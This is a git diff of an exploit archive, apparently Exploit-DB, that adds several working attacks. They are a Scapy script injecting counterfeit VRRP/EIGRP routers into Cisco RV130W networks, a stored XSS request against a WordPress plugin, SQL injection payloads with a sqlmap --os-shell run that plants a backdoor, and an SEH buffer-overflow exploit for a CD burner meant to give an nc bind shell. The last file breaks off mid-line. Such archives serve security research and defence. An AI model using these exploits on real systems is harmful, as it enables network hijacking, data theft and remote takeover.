diff --git a/exploits/hardware/remote/50335.py b/exploits/hardware/remote/50335.py new file mode 100755 index 000000000..94a8183a2 --- /dev/null +++ b/exploits/hardware/remote/50335.py @@ -0,0 +1,76 @@ +# Exploit Title: Cisco small business RV130W 1.0.3.44 - Inject Counterfeit Routers +# Date: 24/09/2021 +# Exploit Author: Michael Alamoot +# Vendor Homepage: https://www.cisco.com/ +# Version: RV130W 1.0.3.44 +# Tested on: Kali linux + +#! /usr/bin/env python3 +from scapy.contrib.eigrp import EIGRPAuthData +from scapy.contrib.eigrp import EIGRPIntRoute +from scapy.contrib.eigrp import EIGRPGeneric +from scapy.contrib.eigrp import EIGRPSeq +from scapy.contrib.eigrp import EIGRP +from scapy.layers.vrrp import VRRPv3 +from scapy.layers.vrrp import VRRP +from scapy.layers.l2 import Ether +from scapy.layers.inet import IP +from scapy.sendrecv import sendp +from scapy.volatile import RandMAC +from scapy.all import conf +import socket,networkx,os +import argparse,sys,asyncio + +class argX: + def __init__(self): + self.parser = argparse.ArgumentParser(description="...") + self.parser.add_argument( + "-i","--ip", + help="ip router fake injection", + dest="ip", + ) + self.parser.add_argument( + "-r","--ip-router", + help="ip router root", + dest="router", + default=conf.route.route('0.0.0.0')[2] + ) + + def argvX(self): + """ [0] ip-router [1] ip-fake """ + args = self.parser.parse_args() + ip = args.ip + route = args.router + return [ip,route] + + +class exploit(object): + + def __new__(cls,*args,**kwargs): + return super(exploit,cls).__new__(cls) + + def __init__(self,IProuter,InjectFackeRouter): + self.IProuter = IProuter + self.InjectFackeRouter = InjectFackeRouter + self.MAC = RandMAC() + + def pyload(self): + pyload = Ether()/IP(src=self.IProuter,dst="224.0.0.18")\ + /VRRPv3(version=3,type=1,vrid=1,priority=100,res=0,adv=100,addrlist=self.InjectFackeRouter)\ + /IP(src=self.IProuter,dst="224.0.0.10") \ + /EIGRP(opcode="Update",asn=100,seq=0,ack=0 + ,tlvlist=[EIGRPIntRoute(dst=self.InjectFackeRouter,nexthop=self.IProuter)]) + return pyload + + def start(self,count=[0,100]): + for i in range(count[0],count[1]): + sendp(self.pyload(),verbose=0,return_packets=False,inter=0,loop=0) + print(f"\033[41m PACKET \033[0m Injection fake routers {self.IProuter} {self.InjectFackeRouter} \033[31m{i}\033[0m") + +if __name__ == "__main__": + a = argX().argvX() + if a[0]: + net1 = exploit(IProuter=a[1],InjectFackeRouter=a[0]) + net1.start() + else: + print("[-h] [--help]") \ No newline at end of file diff --git a/exploits/php/webapps/50316.py b/exploits/php/webapps/50316.py index 5c30a7b29..45ed3743c 100755 --- a/exploits/php/webapps/50316.py +++ b/exploits/php/webapps/50316.py @@ -74,8 +74,9 @@ class CVE_2019_13358: try: request = requests.get(self.args.url, params=params) - except: - raise Exception("Failed to GET to the URL provided") + except Exception as e: + + raise Exception("Failed to GET to the URL provided", e) id = re.search(r"ID=([0-9])*", request.text) diff --git a/exploits/php/webapps/50333.txt b/exploits/php/webapps/50333.txt new file mode 100644 index 000000000..3cc5fcb44 --- /dev/null +++ b/exploits/php/webapps/50333.txt @@ -0,0 +1,32 @@ +# Exploit Title: WordPress Plugin Wappointment 2.2.4 - Stored Cross-Site Scripting (XSS) +# Date: 2021-07-31 +# Exploit Author: Renos Nikolaou +# Software Link: https://downloads.wordpress.org/plugin/wappointment.2.2.4.zip +# Version: 2.2.4 +# Tested on: Windows +# Description : Wappointment is prone to Stored Cross Site Scripting vulnerabilities +# because it fails to properly sanitize user-supplied input. + +# PoC - Stored XSS - Parameter: name +# 1) Open Wappointment Plugin or Visit booking-page http://localhost/booking-page +# 2) Click on any available delivery modality (By Phone, At a Location, Video Meeting or By Skype) +# 3) Select Date and Time, write your email address, your phone number and in the Full Name field type: testname"> +# 4) Click Confirm +# 5) Login as admin to wp-admin portal, Go to Wappointment --> Calendar ( http://localhost/wordpress/wp-admin/admin.php?page=wappointment_calendar ) + + +# Post Request (Step 4): + +POST /wordpress/wp-json/wappointment/v1/services/booking HTTP/1.1 +Host: domain.com +Content-Length: 205 +Accept: application/json, text/plain, */* +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0 +Content-Type: application/json +Origin: http://domain.com +Referer: http://domain.com/wordpress/booking-page/ +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Connection: close + +{"email":"testemail@testemail.com","name":"testname\">","phone":"+00 00 000000","time":1630666800,"ctz":"Europe/Bucharest","service":1,"location":3,"duration":90,"staff_id":2} \ No newline at end of file diff --git a/exploits/php/webapps/50334.txt b/exploits/php/webapps/50334.txt new file mode 100644 index 000000000..b6b187d01 --- /dev/null +++ b/exploits/php/webapps/50334.txt @@ -0,0 +1,50 @@ +# Exploit Title: Library System 1.0 - 'student_id' SQL injection (Authenticated) +# Google Dork: intitle: "Library System by YahooBaba" +# Date: 26/08/2021 +# Exploit Author: Vinay Bhuria +# Vendor Homepage: https://www.yahoobaba.net +# Software Link: https://www.yahoobaba.net/project/library-system-in-php +# Version: v1.0 +# Tested on: Windows + +Description: + +The Library System 1.0 application from Yahoobaba is vulnerable to +SQL injection via the 'student_id' parameter on the student.php page. + +==================== 1. SQLi ==================== + +http://localhost:8081/library-system/student.php + +The "student_id" parameter is vulnerable to SQL injection, it was also tested, and an authenticated +user has the full ability to run system commands via --os-shell and fully compromise the system + +POST parameter 'student_id' is vulnerable. + +step 1 : Navigate to the "Reg student >> View" & capture the request in the proxy tool. +step 2 : Now copy the post request and save it as test.txt file. +step 3 : Run the sqlmap command "sqlmap -r test.txt -p student_id --os-shell" + +---------------------------------------------------------------------- +Parameter: student_id (POST) + Type: boolean-based blind + Title: AND boolean-based blind - WHERE or HAVING clause + Payload: student_id=14 AND 9655=9655 + + Type: error-based + Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) + Payload: student_id=14 OR (SELECT 5735 FROM(SELECT COUNT(*),CONCAT(0x7170717871,(SELECT (ELT(5735=5735,1))),0x716a787871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) + + Type: time-based blind + Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + Payload: student_id=14 AND (SELECT 2937 FROM (SELECT(SLEEP(5)))UeMT) + + Type: UNION query + Title: Generic UNION query (NULL) - 8 columns + Payload: student_id=14 UNION ALL SELECT NULL,NULL,CONCAT(0x7170717871,0x64697648614c6b48736a5a72484e52794d4764507670436659596379577748794a4878747162596c,0x716a787871),NULL,NULL,NULL,NULL,NULL-- - + +[14:03:50] [INFO] the backdoor has been successfully uploaded on 'C:/xampp/htdocs/' - http://localhost:8081/tmpbctla.php +[14:03:50] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER +os-shell> whoami +do you want to retrieve the command standard output? [Y/n/a] y +command standard output: 'desktop-Vinay\vinay' \ No newline at end of file diff --git a/exploits/windows/local/50332.py b/exploits/windows/local/50332.py new file mode 100755 index 000000000..a6c9424e7 --- /dev/null +++ b/exploits/windows/local/50332.py @@ -0,0 +1,66 @@ +# Exploit Title: Ether_MP3_CD_Burner 1.3.8 - Buffer Overflow (SEH) +# Date: 24.09.2021 +# Software Link: https://mp3-avi-mpeg-wmv-rm-to-audio-cd-burner.software.informer.com/download/?caa8ec-1.2 +# Software Link 2: https://anonfiles.com/X2Ff36J6ue/ether_cd_burner_exe +# Exploit Author: Achilles +# Tested Version: 1.3.8 +# Tested on: Windows 7 64bit + +# 1.- Run python code : Ether_MP3_CD_Burner.py +# 2.- Open EVIL.txt and copy All content to Clipboard +# 3.- Open Ether_MP3_CD_Burner and press Register +# 4.- Paste the Content of EVIL.txt into the 'Name and Code Field' +# 5.- Click 'OK' +# 6.- Nc.exe Local IP Port 3110 and you will have a bind shell +# 7.- Greetings go:XiDreamzzXi,Metatron + +#!/usr/bin/env python + +import struct + +buffer = "\x41" * 1008 +nseh = "\xeb\x06\x90\x90" #jmp short 6 +seh = struct.pack('